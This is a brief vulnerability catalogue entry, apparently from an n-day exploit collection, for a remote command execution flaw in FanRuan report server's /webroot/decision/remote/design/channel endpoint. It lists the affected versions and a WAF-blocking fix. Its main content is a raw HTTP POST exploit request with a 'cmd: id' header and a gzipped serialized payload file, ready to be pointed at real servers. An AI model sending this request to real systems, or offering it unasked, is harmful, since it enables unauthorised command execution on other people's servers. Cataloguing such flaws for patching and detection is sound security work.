vendor = "帆软"
name = "帆软报表 channel 远程命令执行漏洞"
type = "RCE"
version = "<10.0.19.42 & <11.0.28"
path = "/webroot/decision/remote/design/channel"
detail = "POST /webroot/decision/remote/design/channel HTTP/1.1 Content-Type: application/json Host: cmd: id Connection: close {{gzip(file(fine10.bin))}}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0726"
label = "nday"
